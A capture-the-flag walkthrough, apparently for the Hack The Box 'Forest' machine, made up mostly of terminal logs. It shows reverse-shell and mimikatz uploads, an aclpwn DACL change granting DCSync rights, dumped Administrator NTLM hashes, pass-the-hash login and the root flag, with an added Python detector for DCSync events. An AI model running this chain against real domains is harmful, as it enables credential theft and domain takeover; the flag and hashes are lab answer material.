*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/shell.exe
Info: Uploading /home/kali/HTB/Forest/shell.exe to C:\Users\svc-alfresco\Documents\shell.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/9/2023 5:41 AM 15180 20230909054106_BloodHound.zip
-a---- 9/9/2023 5:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/9/2023 5:40 AM 833536 SharpHound.exe
-a---- 9/9/2023 6:06 AM 7168 shell.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload /home/kali/HTB/Forest/mimikatz.exe
Info: Uploading /home/kali/HTB/Forest/mimikatz.exe to C:\Users\svc-alfresco\Documents\mimikatz.exe
Data: 1236512 bytes of 1236512 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls
Directory: C:\Users\svc-alfresco\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/9/2023 5:41 AM 15180 20230909054106_BloodHound.zip
-a---- 9/9/2023 6:10 AM 927384 mimikatz.exe
-a---- 9/9/2023 5:41 AM 23611 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/9/2023 5:40 AM 833536 SharpHound.exe
-a---- 9/9/2023 6:06 AM 7168 shell.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./shell.exe
We catch the shell on our machine:
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.161] 51307
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Users\svc-alfresco\Documents>
We run lsadump::dcsync /domain:htb.local /user:Administrator, which doesn't seem to work:
C:\Users\svc-alfresco\Documents>./mimikatz.exe
./mimikatz.exe
'.' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\svc-alfresco\Documents>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.1.1 (x64) #17763 Dec 9 2018 23:56:50
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
mimikatz # mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
ERROR mimikatz_doLocal ; "mimikatz" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # ERROR mimikatz_doLocal ; "[DC]" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
mimikatz #
We can try Invoke-Mimikatz.ps1 with Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"', but we get the same error as above:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./Invoke-Mimikatz.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+ $Processors = Get-WmiObject -Class Win32_Processor
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ... if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565
.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
We run the aclpwn command again and choose path 1:
┌──(kali㉿kali)-[~]
└─$ ~/.local/bin/aclpwn -f [email protected] -t htb.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.161 -sp s3rvice
[!] Unsupported operation: GetChanges on HTB.LOCAL (Domain,Base)
[-] Invalid path, skipping
[!] Unsupported operation: GenericAll on EXCH01.HTB.LOCAL (Computer,Base)
[-] Invalid path, skipping
[+] Path found!
Path [0]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE TRUSTED [email protected])-[MemberOf]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
[+] Path found!
Path [1]: ([email protected])-[MemberOf]->(SERVICE [email protected])-[MemberOf]->(PRIVILEGED IT [email protected])-[MemberOf]->(ACCOUNT [email protected])-[GenericAll]->(EXCHANGE WINDOWS [email protected])-[WriteDacl]->(HTB.LOCAL)
Please choose a path [0-1] 1
[-] Memberof -> continue
[-] Memberof -> continue
[-] Memberof -> continue
[-] Adding user SVC-ALFRESCO to group EXCHANGE WINDOWS [email protected]
[+] Added CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local as member to CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=htb,DC=local
[-] Re-binding to LDAP to refresh group memberships of [email protected]
[+] Re-bind successful
[-] Modifying domain DACL to give DCSync rights to SVC-ALFRESCO
[+] Dacl modification successful
[+] Finished running tasks
[+] Saved restore state to aclpwn-20230909-093211.restore
Then we try mimikatz again, and this time we get the hash.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Invoke-Mimikatz -Command '"lsadump::dcsync /domain:htb.local /user:Administrator"'
Access denied
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2579 char:27
+ $Processors = Get-WmiObject -Class Win32_Processor
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Get-WmiObject], ManagementException
+ FullyQualifiedErrorId : GetWMIManagementException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
The property 'AddressWidth' cannot be found on this object. Verify that the property exists.
At C:\Users\svc-alfresco\Documents\Invoke-Mimikatz.ps1:2593 char:14
+ ... if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Hostname: FOREST.htb.local / S-1-5-21-3072663084-364016917-1341370565
.#####. mimikatz 2.1.1 (x64) built on Nov 12 2017 15:32:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::dcsync /domain:htb.local /user:Administrator
[DC] 'htb.local' will be the domain
[DC] 'FOREST.htb.local' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
User Principal Name : [email protected]
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 8/30/2021 5:51:58 PM
Object Security ID : S-1-5-21-3072663084-364016917-1341370565-500
Object Relative ID : 500
Credentials:
Hash NTLM: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 0: 32693b11e6aa90eb43d32c72a07ceea6
ntlm- 1: 9307ee5abf7791f3424d9d5148b20177
ntlm- 2: 32693b11e6aa90eb43d32c72a07ceea6
lm - 0: 9498c81fd53411e023fcd1ff4cd3e482
lm - 1: f505fe58b1dedbe3015454d212af5115
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : cad4a87763ba795c795b96486148bb95
* Primary:Kerberos-Newer-Keys *
Default Salt : HTB.LOCALAdministrator
Default Iterations : 4096
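From the defender's side, the DACL change above lets an ordinary service account request directory replication, which a domain controller records as Security event 4662 carrying the two replication control-access-right GUIDs. The following added example (not part of the writeup or of any tool it uses) flags 4662 records where a principal other than a DC computer account exercised those rights; the event records, the flattened "key=value" layout and the DC list are constructed sample data, while the two replication GUIDs are the well-known ones.

```python
"""Added detection example: spot DCSync-style replication requests in
Security event 4662 records made by non-DC principals."""
import re

# Well-known extended-right GUIDs that a replication (DCSync) request needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}

# Constructed 4662 records, flattened to "key=value; ..." lines for this example.
# The last GUID on the third record is a placeholder attribute GUID, not a real one.
SAMPLE_EVENTS = [
    "EventID=4662; SubjectUserName=FOREST$; SubjectDomainName=HTB; "
    "ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9}; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=svc-alfresco; SubjectDomainName=HTB; "
    "ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9}; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=svc-alfresco; SubjectDomainName=HTB; "
    "ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2}; "
    "Properties={aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa}",
    "EventID=4624; SubjectUserName=svc-alfresco; SubjectDomainName=HTB",
]

# Constructed allow-list: computer accounts of legitimate domain controllers.
DC_ACCOUNTS = {"FOREST$"}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}")


def parse_event(line):
    """Split a flattened record into a dict; Properties becomes a set of GUIDs."""
    fields = dict(part.split("=", 1) for part in line.split("; "))
    fields["Properties"] = set(GUID_RE.findall(fields.get("Properties", "")))
    return fields


def find_dcsync_candidates(lines, dc_accounts=DC_ACCOUNTS):
    """Return (subject, rights) for 4662 events where a non-DC principal used replication rights."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662" or ev["SubjectUserName"] in dc_accounts:
            continue  # not a directory access event, or a DC doing normal replication
        used = ev["Properties"] & set(REPLICATION_RIGHTS)
        if used:
            subject = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
            hits.append((subject, sorted(REPLICATION_RIGHTS[g] for g in used)))
    return hits


if __name__ == "__main__":
    for subject, rights in find_dcsync_candidates(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Pairing this with event 5136 on the domain object (the DACL write aclpwn performed) gives the earlier of the two signals; 4662 only fires once replication is actually requested.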
We use evil-winrm and pass the hash: evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> ls
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/20/2019 4:04 PM Contacts
d-r--- 9/23/2019 2:15 PM Desktop
d-r--- 9/23/2019 3:46 PM Documents
d-r--- 9/20/2019 4:04 PM Downloads
d-r--- 9/20/2019 4:04 PM Favorites
d-r--- 9/20/2019 4:04 PM Links
d-r--- 9/20/2019 4:04 PM Music
d-r--- 9/20/2019 4:04 PM Pictures
d-r--- 9/20/2019 4:04 PM Saved Games
d-r--- 9/20/2019 4:04 PM Searches
d-r--- 9/20/2019 4:04 PM Videos
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/9/2023 5:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
cdb539c41b826bb97ec6dfbf750a375d
*Evil-WinRM* PS C:\Users\Administrator\Desktop>